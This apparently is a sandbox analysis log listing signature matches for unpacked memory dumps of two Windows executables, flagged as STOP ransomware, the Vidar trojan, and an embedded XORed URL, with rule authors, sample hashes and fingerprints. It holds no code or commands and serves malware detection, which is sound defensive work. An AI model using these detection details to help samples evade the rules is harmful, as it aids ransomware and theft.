Source: 7.2.2OmglUwx83.exe.22a15a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 7.2.2OmglUwx83.exe.22a15a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 7.2.2OmglUwx83.exe.22a15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.2OmglUwx83.exe.23415a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 10.2.2OmglUwx83.exe.23415a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.2OmglUwx83.exe.23415a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.2OmglUwx83.exe.21f15a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 6.2.2OmglUwx83.exe.21f15a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.2OmglUwx83.exe.21f15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.0.build2.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 0.2.2OmglUwx83.exe.22915a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0.2.2OmglUwx83.exe.22915a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.2OmglUwx83.exe.22915a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.2OmglUwx83.exe.23415a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 10.2.2OmglUwx83.exe.23415a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.2OmglUwx83.exe.23415a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.0.build2.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
